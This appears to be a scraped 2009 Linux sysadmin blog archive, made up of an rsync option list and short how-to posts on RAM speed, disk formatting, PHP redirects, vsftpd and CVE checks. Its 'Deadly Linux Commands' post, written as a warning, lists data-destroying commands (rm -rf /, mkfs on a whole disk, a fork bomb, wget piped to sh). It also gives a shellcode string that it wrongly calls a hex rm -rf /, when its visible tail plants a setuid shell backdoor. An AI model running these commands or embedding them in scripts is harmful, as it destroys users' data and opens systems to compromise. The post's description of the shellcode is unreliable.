--ignore-errors delete even if there are I/O errors
--force force deletion of dirs even if not empty
--max-delete=NUM donât delete more than NUM files
--max-size=SIZE donât transfer any file larger than SIZE
--min-size=SIZE donât transfer any file smaller than SIZE
--partial keep partially transferred files
--partial-dir=DIR put a partially transferred file into DIR
--delay-updates put all updated files into place at end
-m, --prune-empty-dirs prune empty directory chains from file-list
--numeric-ids donât map uid/gid values by user/group name
--timeout=TIME set I/O timeout in seconds
-I, --ignore-times donât skip files that match size and time
--size-only skip files that match in size
--modify-window=NUM compare mod-times with reduced accuracy
-T, --temp-dir=DIR create temporary files in directory DIR
-y, --fuzzy find similar file for basis if no dest file
--compare-dest=DIR also compare received files relative to DIR
--copy-dest=DIR ... and include copies of unchanged files
--link-dest=DIR hardlink to files in DIR when unchanged
-z, --compress compress file data during the transfer
--compress-level=NUM explicitly set compression level
-C, --cvs-exclude auto-ignore files in the same way CVS does
-f, --filter=RULE add a file-filtering RULE
-F same as --filter=âdir-merge /.rsync-filterâ
repeated: --filter=â- .rsync-filterâ
--exclude=PATTERN exclude files matching PATTERN
--exclude-from=FILE read exclude patterns from FILE
--include=PATTERN donât exclude files matching PATTERN
--include-from=FILE read include patterns from FILE
--files-from=FILE read list of source-file names from FILE
-0, --from0 all *from/filter files are delimited by 0s
--address=ADDRESS bind address for outgoing socket to daemon
--port=PORT specify double-colon alternate port number
--sockopts=OPTIONS specify custom TCP options
--blocking-io use blocking I/O for the remote shell
--stats give some file-transfer stats
-8, --8-bit-output leave high-bit chars unescaped in output
-h, --human-readable output numbers in a human-readable format
--progress show progress during transfer
-P same as --partial --progress
-i, --itemize-changes output a change-summary for all updates
--out-format=FORMAT output updates using the specified FORMAT
--log-file=FILE log what weâre doing to the specified FILE
--log-file-format=FMT log updates using the specified FMT
--password-file=FILE read password from FILE
--list-only list the files instead of copying them
--bwlimit=KBPS limit I/O bandwidth; KBytes per second
--write-batch=FILE write a batched update to FILE
--only-write-batch=FILE like --write-batch but w/o updating dest
--read-batch=FILE read a batched update from FILE
--protocol=NUM force an older protocol version to be used
--checksum-seed=NUM set block/file checksum seed (advanced)
-4, --ipv4 prefer IPv4
-6, --ipv6 prefer IPv6
--version print version number
(-h) --help show this help (see below for -h comment)

Rsync can also be run as a daemon, in which case the following options are accepted:

--daemon run as an rsync daemon
--address=ADDRESS bind to the specified address
--bwlimit=KBPS limit I/O bandwidth; KBytes per second
--config=FILE specify alternate rsyncd.conf file
--no-detach do not detach from the parent
--port=PORT listen on alternate port number
--log-file=FILE override the "log file" setting
--log-file-format=FMT override the "log format" setting
--sockopts=OPTIONS specify custom TCP options
-v, --verbose increase verbosity
-4, --ipv4 prefer IPv4
-6, --ipv6 prefer IPv6
-h, --help show this help (if used after --daemon)

Thursday, August 20, 2009

The 7 Deadly Linux Commands

SkyHi @ Thursday, August 20, 2009
If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.

1. Code:

rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

Reference: http://www.linux-masters.com/2009/08/7-deadly-linux-commands.html

Ubuntu x64 with 4GB ram but only show s 3GB

SkyHi @ Thursday, August 20, 2009
at /boot/config-2.6.24-23-generic | grep HIGH

This will show your kernel memory configuration

CONFIG_HIGHMEM=y
CONFIG_HIGHPTE=y
CONFIG_HIGH_RES_TIMERS=y
# CONFIG_NOHIGHMEM is not set
CONFIG_HIGHMEM4G=y
# CONFIG_HIGHMEM64G is not set

Ensure CONFIG_HIGHMEM is set to y and CONFIG_HIGHMEM4G is set to y
also you can try with the server kernel what is configured to support 64GB by default

if HIGHMEM and HIGIMEM4G are enabled it's a BIOS problem



http://uk.answers.yahoo.com/question/index?qid=20090727102210AAtoEc7
Reference: http://ubuntuforums.org/showthread.php?t=1030027

PHP Redirect To Another URL / Page Script

SkyHi @ Thursday, August 20, 2009
How do I redirect with PHP script?

Under PHP you need to use header() to send a raw HTTP header.

Using headers() method, you can easily transferred to the new page without having to click a link to continue. This is also useful for search engines. Remember that header() must be called before any actual output is sent, either by normal HTML tags, blank lines in a file, or from PHP. It is a very common error to read code with include(), or require(), functions, or another file access function, and have spaces or empty lines that are output before header() is called. The same problem exists when using a single PHP/HTML file.
PHP Redirect Script

You can easily redirect using following code:


/* Redirect browser */
header("Location: http://theos.in/");
/* Make sure that code below does not get executed when we redirect. */
exit;
?>


Another sample hack

Sample function - sitefunctions.php (note I'm not the author of the following I found it somewhere else on the Internet):

function movePage($num,$url){
static $http = array (
100 => "HTTP/1.1 100 Continue",
101 => "HTTP/1.1 101 Switching Protocols",
200 => "HTTP/1.1 200 OK",
201 => "HTTP/1.1 201 Created",
202 => "HTTP/1.1 202 Accepted",
203 => "HTTP/1.1 203 Non-Authoritative Information",
204 => "HTTP/1.1 204 No Content",
205 => "HTTP/1.1 205 Reset Content",
206 => "HTTP/1.1 206 Partial Content",
300 => "HTTP/1.1 300 Multiple Choices",
301 => "HTTP/1.1 301 Moved Permanently",
302 => "HTTP/1.1 302 Found",
303 => "HTTP/1.1 303 See Other",
304 => "HTTP/1.1 304 Not Modified",
305 => "HTTP/1.1 305 Use Proxy",
307 => "HTTP/1.1 307 Temporary Redirect",
400 => "HTTP/1.1 400 Bad Request",
401 => "HTTP/1.1 401 Unauthorized",
402 => "HTTP/1.1 402 Payment Required",
403 => "HTTP/1.1 403 Forbidden",
404 => "HTTP/1.1 404 Not Found",
405 => "HTTP/1.1 405 Method Not Allowed",
406 => "HTTP/1.1 406 Not Acceptable",
407 => "HTTP/1.1 407 Proxy Authentication Required",
408 => "HTTP/1.1 408 Request Time-out",
409 => "HTTP/1.1 409 Conflict",
410 => "HTTP/1.1 410 Gone",
411 => "HTTP/1.1 411 Length Required",
412 => "HTTP/1.1 412 Precondition Failed",
413 => "HTTP/1.1 413 Request Entity Too Large",
414 => "HTTP/1.1 414 Request-URI Too Large",
415 => "HTTP/1.1 415 Unsupported Media Type",
416 => "HTTP/1.1 416 Requested range not satisfiable",
417 => "HTTP/1.1 417 Expectation Failed",
500 => "HTTP/1.1 500 Internal Server Error",
501 => "HTTP/1.1 501 Not Implemented",
502 => "HTTP/1.1 502 Bad Gateway",
503 => "HTTP/1.1 503 Service Unavailable",
504 => "HTTP/1.1 504 Gateway Time-out"
);
header($http[$num]);
header ("Location: $url");
}

Now call it as follows:

@include("/path/to/sitefunctions.php");
movePage(403,"http://www.cyberciti.biz/");
?>

Linux Find The Speed Of Memory Through Software Command Prompt

SkyHi @ Thursday, August 20, 2009
How do I find out or identify the speed of my memory (DIMM) through command prompt options under Linux operating systems? How do I find out speed of the DIMM's using a shell prompt?

You can find out the speed using dmidecode or lshw command under any Linux distribution.
Install lshw

If you are using Debian / Ubuntu Linux, enter:
# apt-get install lshw
If you are RHEL / Fedora / Red Hat / CentOS Linux, enter the following after enabling EPEL repo:
# yum install lshw
How do I use lshw to display DIMM speed?

Type the command as follows:
# lshw -short -C memory
Outputs:

H/W path Device Class Description
=======================================================
/0/0 memory 108KiB BIOS
/0/4/6 memory 16KiB L1 cache
/0/4/7 memory 8MiB L2 cache
/0/5/8 memory 16KiB L1 cache
/0/5/9 memory 8MiB L2 cache
/0/16 memory 12GiB System Memory
/0/16/0 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/1 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/2 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/3 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/4 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/5 memory DIMM Synchronous 667 MHz (1.5 ns) [empty]
/0/16/6 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/7 memory DIMM Synchronous 667 MHz (1.5 ns) [empty]

See how to use dmidecode to find out RAM speed and type under Linux.

Reference: http://www.cyberciti.biz/faq/linux-find-memory-speed-dimm-command/

Linux: Check Ram Speed and Type

SkyHi @ Thursday, August 20, 2009
How do I check RAM speed and type (line DDR or DDR2) without opening my computer? I need to purchase RAM and I need to know the exact speed and type installed. How do I find out ram information from a shell prompt?

You need to use biosdecode command line utility. Dmidecode is a tool or dumping a computer's DMI (some say SMBIOS) table contents in a human-readable format. The output contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers and BIOS revision. This command works under Linux, UNIX and BSD computers.
Open a shell prompt and type the following command:
$ sudo dmidecode --type 17
OR
$ sudo dmidecode --type 17 | more
Sample output:

# dmidecode 2.9
SMBIOS 2.4 present.

Handle 0x0018, DMI type 17, 27 bytes
Memory Device
Array Handle: 0x0017
Error Information Handle: Not Provided
Total Width: 64 bits
Data Width: 64 bits
Size: 2048 MB
Form Factor: DIMM
Set: None
Locator: J6H1
Bank Locator: CHAN A DIMM 0
Type: DDR2
Type Detail: Synchronous
Speed: 800 MHz (1.2 ns)
Manufacturer: 0x2CFFFFFFFFFFFFFF
Serial Number: 0x00000000
Asset Tag: Unknown
Part Number: 0x5A494F4E203830302D3247422D413131382D

Handle 0x001A, DMI type 17, 27 bytes
Memory Device
Array Handle: 0x0017
Error Information Handle: Not Provided
Total Width: Unknown
Data Width: Unknown
Size: No Module Installed
Form Factor: DIMM
Set: None
Locator: J6H2
Bank Locator: CHAN A DIMM 1
Type: DDR2
Type Detail: None
Speed: Unknown
Manufacturer: NO DIMM
Serial Number: NO DIMM
Asset Tag: NO DIMM
Part Number: NO DIMM

See also:

1. Linux Find The Speed Of Memory Through Software Command Prompt

Reference: http://www.cyberciti.biz/faq/check-ram-speed-linux/

FreeBSD: How To Add A Second Hard Disk

SkyHi @ Thursday, August 20, 2009
Q. How do I add a second hard disk to my FreeBSD server? How do I partition, label and mount a new hard disk under FreeBSD for backup or additional data?

A. There are two ways to install a new hard disk under FreeBSD system. You can use all command line utilities such as fdisk,bsdlabel and newfs to create partitions, label and format it. This method requires complete understanding of BSD partitions and other stuff.
Using sysinstall - Easy way to add a new hard disk

The sysinstall utility is used for installing and configuring FreeBSD systems including hard disks. sysinstall offers options to partition and label a new disk using its easy to use menus. Login as root user. Run sysinstall and enter the Configure menu. Within the FreeBSD Configuration Menu, scroll down and select the Fdisk option:
# sysinstall
Alternatively, use sudo (if configured) to run sysinstall:
$ sudo sysinstall
[Warning examples may crash your computer] WARNING! These examples may result into data loss or crash your computer if executed without proper care. This FAQ assumes that you have added a hard disk to the system. Also, replace ad to da (if using SCSI hard disk). Please note that any existing data on 2nd hard disk will get wiped out. Make sure you have backup of all import data and config files.
Fig.01: Scroll down to Configure and press [enter]

Fig.01: Scroll down to Configure and press [enter]
Fig.02: Select Fdisk and press [enter]

Fig.02: Select Fdisk and press [enter]
Fig.03: Select the appropriate drive and press [enter]

Fig.03: Select the appropriate drive and press [enter]

The new drive will probably be the second in the list with a name like ad1 or ad2 and so on. In above example it is ad6.
Using fdisk

Once inside fdisk, pressing A will use the entire disk for FreeBSD. When asked if you want to "remain cooperative with any future possible operating systems", answer YES. Write the changes to the disk using W. Now exit the FDISK editor by pressing Q. Next you will be asked about the "Master Boot Record". Since you are adding a disk to an already running system, choose None. The next dialog will say that the operation was successful. Press [enter]. Type Q to quit FDISK.
Using disklable

Next, you need to exit sysinstall and start it again. Restart sysinstall by typing sysinstall:
# sysinstall
Select Configure and press [enter]. Select Label and press [enter]. A dialog asking you to select the drive will appear. Select the appropriate drive and press [enter].

This is where you will create the traditional BSD partitions:

1. A disk can have up to eight partitions, labeled a-h.
2. The a partition is used for the root partition (/). Thus only your system disk (e.g, the disk you boot from) should have an a partition.
3. The b partition is used for swap partitions, and you may have many disks with swap partitions.
4. The c partition addresses the entire disk in dedicated mode, or the entire FreeBSD slice in slice mode.
5. The other partitions are for general use.

Now press C to create a partition.

* Set partition size, to use the whole drive, press [enter].
* Next, choose fs and press [enter].
* Type /disk2 as mount point and press [enter] (don't use the name of a directory that already exists because sysinstall will mount the new partition on top of it)
* To finalize the changes, press W, select yes and press [enter].

Update /etc/fstab

The last step is to edit /etc/fstab to add an entry for your new disk, enter:
# vi /etc/fstab
Append entry like as follows (make sure you replace parition name with actual values):

/dev/ad6s1d /disk2 ufs rw 2 2

Here is my sample /etc/fstab file:

/dev/ad4s1a 520M 393M 85M 82% /
devfs 1.0k 1.0k 0B 100% /dev
/dev/ad6s1d 243G 75G 148G 34% /disk2
/dev/ad4s1d 520M 22M 456M 5% /tmp
/dev/ad4s1f 230G 4.6G 207G 2% /usr
/dev/ad4s1e 10G 130M 9.4G 1% /var
devfs 1.0k 1.0k 0B 100% /var/named/dev
devfs 1.0k 1.0k 0B 100% /usr/home/jail/www.example.com/dev

Save and close the file. The new drive should mount automatically at /disk2 after reboot. To mount it immediately, enter:
# mount -a
# df -H


Referece: http://www.cyberciti.biz/faq/freebsd-adding-second-hard-disk-howto/

Explain: Five Nines ( 99.999% ) Computer / Network Uptime Concept

SkyHi @ Thursday, August 20, 2009
Q. Some service provider guarantees 99.999% uptime for their service. Can you explain meaning of five nines?

A. The uptime and reliability of computer and communications facilities is sometimes measured in nines. Having a computer system's availability of 99.999% means the system is highly available, delivering its service to the user 99.999% of the time it is needed. In other words you get a total downtime of approximately five minutes and fifteen seconds per year with 99.999% uptime.
Availability per day per month per year
99.999% 00:00:00.4 00:00:26 00:05:15
99.99% 00:00:08 00:04:22 00:52:35
99.9% 00:01:26 00:43:49 08:45:56
99% 00:14:23 07:18:17 87:39:29

A service level agreement (SLA) is a part of a service contract where the level of service is formally defined including uptime. Uptime agreements are very common metric, often used for data and network services such as hosting, servers and dedicated servers, leased lines. Common agreements include percentage of network uptime, power uptime, amount of scheduled maintenance windows etc.

To achieve true 99.999% uptime you need multiple tier 4 data center and including capacity planning. 99.999% uptime is recommended for mission-critical stuff and e-commerce.

You can run the following command on UNIX / Linux to see uptime:
$ uptime
Under Windows server 2003 / 2008 / XP or Vista, type the following command at command prompt to see uptime:
systeminfo | find "Up Time"

Red Hat / CentOS Linux Install Suhosin PHP 5 Protection Security Patch

SkyHi @ Thursday, August 20, 2009
Q. Wordpress and many other open source application developers asks users to protect PHP apps using Suhosin patch to get protection from the full exploit. Suhosin is an advanced protection system for PHP installations. It was designed to protect your servers from various attacks. How do I install Suhosin under RHEL / CentOS / Fedora Linux?

A. Suhosin was designed to protect your servers against a number of well known problems in PHP applications and on the other hand against potential unknown vulnerabilities within these applications or the PHP core itself including wordpress and many other open source php based apps.
Install Suhosin as extension

Download latest version of Suhosin, enter:
# cd /opt
# wget http://download.suhosin.org/suhosin-0.9.27.tgz
Make sure you have php-devel installed:
# yum install php-devel
Compile Suhosin under PHP 5 and RHEL / CentOS Linux

Type the following commands:
# cd suhosin-0.9.27
# phpize
#./configure
# make
# make install
Configure Suhosin

Type the following command to create Suhosin configuration file:
# echo 'extension=suhosin.so' > /etc/php.d/suhosin.ini
Restart web server

Type the following command to restart httpd:
# service httpd restart
If you are using lighttpd, enter:
# service lighttpd restart
Verify Suhosin installation

Type the following command:
$ php -v
Sample output:

PHP 5.1.6 (cli) (built: Jun 12 2008 05:02:36)
Copyright (c) 1997-2006 The PHP Group
Zend Engine v2.1.0, Copyright (c) 1998-2006 Zend Technologies
with XCache v1.2.2, Copyright (c) 2005-2007, by mOo
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH

You can find more information by running phpinfo():

phpinfo();
?>

Sample output:
Fig.01: Suhosin information and settings displayed by phpinfo().

Fig.01: Suhosin information and settings displayed by phpinfo().

Linux / UNIX Shell: Sort IP Address

SkyHi @ Thursday, August 20, 2009
Q. I'd like to sort a list of IP address stored in a text file. How do I sort by last notation or entire address under Linux or UNIX operating systems?

A.. You need to use sort command to displays the lines of its input listed in sorted order. Sorting is done based on one or more sort keys extracted from each line of input. By default, the entire input is taken as sort key. Blank space is taken used as default field separator.
Sort command to sort IP address

Here is our sample input file:

192.168.1.100
192.168.1.19
192.168.1.102
192.168.2.1
192.168.0.2

Type the following sort command:
$ sort -t . -k 3,3n -k 4,4n /path/to/file
Sample output:

192.168.0.2
192.168.1.19
192.168.1.100
192.168.1.102
192.168.2.1

Where,

* -t . : Set field to . (dot) as our IPs separated by dot symbol
* -n : Makes the program sort according to numerical value
* -k opts: Sort data / fields using the given column number. For example, the option -k 2 made the program sort using the second column of data. The option -k 3,3n -k 4,4n sorts each column. First it will sort 3rd column and then 4th column.

Find Out If Patch Number ( CVE ) Has Been Applied To RHEL / CentOS Linux

SkyHi @ Thursday, August 20, 2009
Find Out If Patch Number ( CVE ) Has Been Applied To RHEL / CentOS Linux

Q. I know how to update my system using yum command. But how can I find out that patch has been applied to a package? How do I search CVE patch number applied to a package under Red Hat / CentOS / RHEL / Fedora Linux?

A. You need to use rpm command. Each rpm package stores information about patches including date, small description and CVE number. You can use the -q query option to display change information for the package.
rpm --changelog option

Use the command as follows:
rpm -q --changelog {package-name}
rpm -q --changelog {package-name} | more
rpm -q --changelog {package-name} | grep CVE-NUMBER

For example find out if CVE-2008-1927 has been applied to perl package or not, enter:
# rpm -q --changelog perl|grep CVE-2008-1927
Sample output:

- CVE-2008-1927 perl: double free on regular expressions with utf8 characters

List all applied patches for php, enter:
# rpm -q --changelog php
Sample output:

* Tue Jun 03 2008 Joe Orton 5.1.6-20.el5_2.1
- add security fixes for CVE-2007-5898, CVE-2007-4782, CVE-2007-5899,
CVE-2008-2051, CVE-2008-2107, CVE-2008-2108 (#445923)

* Tue Jan 15 2008 Joe Orton 5.1.6-20.el5
- use magic.mime provided by file (#240845)
- fix possible crash with setlocale() (#428675)

* Thu Jan 10 2008 Joe Orton 5.1.6-19.el5
- ext/date: fix test cases for recent timezone values (#266441)

* Thu Jan 10 2008 Joe Orton 5.1.6-18.el5
- ext/date: updates for system tzdata support (#266441)

* Wed Jan 09 2008 Joe Orton 5.1.6-17.el5
- ext/date: use system timezone database (#266441)

* Tue Jan 08 2008 Joe Orton 5.1.6-16.el5
- add dbase extension in -common (#161639)
- add /usr/share/php to builtin include_path (#238455)
- ext/ldap: enable ldap_sasl_bind (#336221)
- ext/libxml: reset stream context (#298031)
.........
...
....
* Fri May 16 2003 Joe Orton 4.3.1-3
- link odbc module correctly
- patch so that php -n doesn't scan inidir
- run tests using php -n, avoid loading system modules

* Wed May 14 2003 Joe Orton 4.3.1-2
- workaround broken parser produced by bison-1.875

* Tue May 06 2003 Joe Orton 4.3.1-1
- update to 4.3.1; run test suite
- open extension modules with RTLD_NOW rather than _LAZY

How do I find CVE for a rpm file itself?

Above command will query installed package only. To query rpm file, enter:
$ rpm -qp --changelog rsnapshot-1.3.0-1.noarch.rpm | more

Linux format external USB hard disk Partition

SkyHi @ Thursday, August 20, 2009
Q. I have an external new hard drive connected using USB port under Red Hat Fedora Core Linux. I want to use it for backup. There are two partition /dev/sda1 and /dev/sda2. This hard disk was setup and formatted by friend under Windows XP (NTFS partition). Now I want to format and use one partition for Linux and another for Windows XP.

How do I format sda1 without losing data from /dev/sda2?

A. To format /dev/sda1 as Linux ext3 partition use command mkfs.ext3. It is used to create an ext2/ext3 filesystem

Type the command as follows:
# mkfs.ext3 /dev/sda1

Before hitting [enter] key make sure you double check partition device name (/dev/sda1). If unsure make backup of important data on USB pen or DVD disk.


nik@Januty:~$ dmesg
[ 3573.698883] usbcore: registered new interface driver usb-storage
[ 3573.698890] USB Mass Storage support registered.
[ 3573.699114] usb-storage: device found at 3
[ 3573.699117] usb-storage: waiting for device to settle before scanning
[ 3578.690390] usb-storage: device scan complete
[ 3578.691230] scsi 2:0:0:0: Direct-Access WDC WD40 0BB-23JHA1 1C06 PQ: 0 ANSI: 2 CCS
[ 3578.692345] sd 2:0:0:0: Attached scsi generic sg2 type 0
[ 3578.698932] sd 2:0:0:0: [sdb] 78156288 512-byte logical blocks: (40.0 GB/37.2 GiB)
[ 3578.701348] sd 2:0:0:0: [sdb] Write Protect is off
[ 3578.701356] sd 2:0:0:0: [sdb] Mode Sense: 00 38 00 00
[ 3578.701361] sd 2:0:0:0: [sdb] Assuming drive cache: write through
[ 3578.706594] sd 2:0:0:0: [sdb] Assuming drive cache: write through
[ 3578.706605] sdb: sdb1
[ 3578.715633] sd 2:0:0:0: [sdb] Assuming drive cache: write through
[ 3578.715642] sd 2:0:0:0: [sdb] Attached SCSI disk


Step 2:

nik@Januty:~$mkfs.ext3 /dev/sdb
mke2fs 1.41.9 (22-Aug-2009)
/dev/sdb is entire device, not just one partition!
Proceed anyway? (y,n) y
mkfs.ext3: Permission denied while trying to determine filesystem size

Step 3:
nik@Januty:~$sudo mkdir /mnt/sdb
nik@Januty:~$sudo mount /dev/sdb /mnt/sdb



Ubuntu Linux format USB pen drive

Q. How do I format a USB pen drive under Ubuntu Linux for ext3 file system?
A. You can format USB pen drive with the help of following commands:

[a] fdisk : Partition table manipulator for Linux

[b] mkfs.ext3 : Create an ext2/ext3 filesystem by formatting given partition name (/dev/partition)

[c] e2label : Change the label on an ext2/ext3 filesystem

First make sure USB pen is not mounted. Click on Places > Computer > Select USB pen > Right click > Select Unmount Volume.

Let us assume that /dev/sda1 is your partition name for USB pen. To format type the following command (Open X terminal and type the command)
$ sudo mkfs.ext3 /dev/sda1
Caution: Careful while entering device/partition name; wrong name can wipe out entire hard disk!!!
Now use e2label command to change the filesystem label on the ext3 filesystem located on device /dev/sda1:
$ sudo e2label /dev/sda1 usb-pen
You can also create an MS-DOS/Windows XP file system under Linux, enter:
$ sudo mkfs.vfat /dev/sda1

Now you are ready to use USB pen.

vsftpd vsftpd.conf

SkyHi @ Thursday, August 20, 2009
[root@web12 home]# cat vsftpd.conf
# Example config file /etc/vsftpd/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
# Allow anonymous FTP? (Beware - allowed by default if you comment this out).
#anonymous_enable=YES
anonymous_enable=NO
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
#anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
###modified
xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format
#xferlog_std_format=YES
xferlog_std_format=NO
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
ftpd_banner=**** WARNING - Your actions are being logged ****
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd/banned_emails
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd/chroot_list

###Added April 14 2009 jail each user into their specified directory####
chroot_local_user=YES
user_config_dir=/etc/vsftpd/vsftpd_user_conf
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# When "listen" directive is enabled, vsftpd runs in standalone mode and
# listens on IPv4 sockets. This directive cannot be used in conjunction
# with the listen_ipv6 directive.
listen=YES
#
# This directive enables listening on IPv6 sockets. To listen on IPv4 and IPv6
# sockets, you must run two copies of vsftpd whith two configuration files.
# Make sure, that one of the listen options is commented !!
#listen_ipv6=YES

pam_service_name=vsftpd
userlist_enable=YES
tcp_wrappers=YES


####This function is to enable passive mode
pasv_enable=YES
#This function is to limite passive mode range from 50000 to 51000 TCP ports
pasv_min_port=60000
pasv_max_port=60040
#port_enable=YES

###TLS Support###
ssl_enable=YES
allow_anon_ssl=NO
force_local_data_ssl=NO
#force_local_logins_ssl=YES
force_local_logins_ssl=NO
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
rsa_cert_file=/etc/vsftpd/vsftpd.pem


###Performance ###
#Specifies the maximum of clients allowed to connected from the same source IP address.
max_per_ip=3
#Specifies the maximum number of simultaneous clients allowed to connect to the
#server when it is running in standalone mode.
max_clients=50
##Specifies the maximum rate data is transfered for local users logged into the server in bytes per second.
local_max_rate=0
#Specifies the maximum amount of time between commands from a remote client.
idle_session_timeout=400
#Specifies the maximum amount of time a client using active mode has to respond to
#a data connection, in seconds.
connect_timeout=60



[root@home vsftpd]# iptables -L -n
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:21
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:20
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpts:60000:60040


[root@home log]# cat /etc/vsftpd/vsftpd_user_conf/user101
dirlist_enable=YES
local_root=/var/www/html/home.exmaple.net/html/site1/

pdftotext: Linux / UNIX Convert a PDF File To Text Format

SkyHi @ Thursday, August 20, 2009
Question: I've downloaded configuration file in a PDF format. I do not have GUI installed on remote Linux / UNIX server. How do I convert a PDF (Portable Document Format) file to a text format using command line so that I can view file over remote ssh session?

Answer: Use pdftotext utility to convert Portable Document Format (PDF) files to plain text. It reads the PDF file, and writes a text file. If text file is not specified, pdftotext converts file.pdf to file.txt. If text-file is -, the text is sent to stdout.

Install pdftotext under RedHat / RHEL / Fedora / CentOS Linux

pdftotext is installed using poppler-utils package under various Linux distributions:
# yum install poppler-utils
OR use the following under Debian / Ubuntu Linux
$ sudo apt-get install poppler-utils

pdftotext syntax

pdftotext {PDF-file} {text-file}

How do I convert a pdf to text?

Convert a pdf file called hp-manual.pdf to hp-manual.txt, enter:
$ pdftotext hp-manual.pdf hp-manual.txt

Specifies the first page 5 and last page 10 (select 5 to 10 pages) to convert, enter:
$ pdftotext -f 5 -l 10 hp-manual.pdf hp-manual.txt

Convert a pdf file protected and encrypted by owner password:
$ pdftotext -opw 'password' hp-manual.pdf hp-manual.txt

Convert a pdf file protected and encrypted by user password:
$ pdftotext -upw 'password' hp-manual.pdf hp-manual.txt

Sets the end-of-line convention to use for text output. You can set it to unix, dos or mac. For UNIX / Linux oses, enter:
$ pdftotext -eol unix hp-manual.pdf hp-manual.txt

Further readings:

  • man page pdftotext
REFERENCES
http://www.cyberciti.biz/faq/converter-pdf-files-to-text-format-command/

error: hde: attached ide-disk driver

SkyHi @ Thursday, August 20, 2009
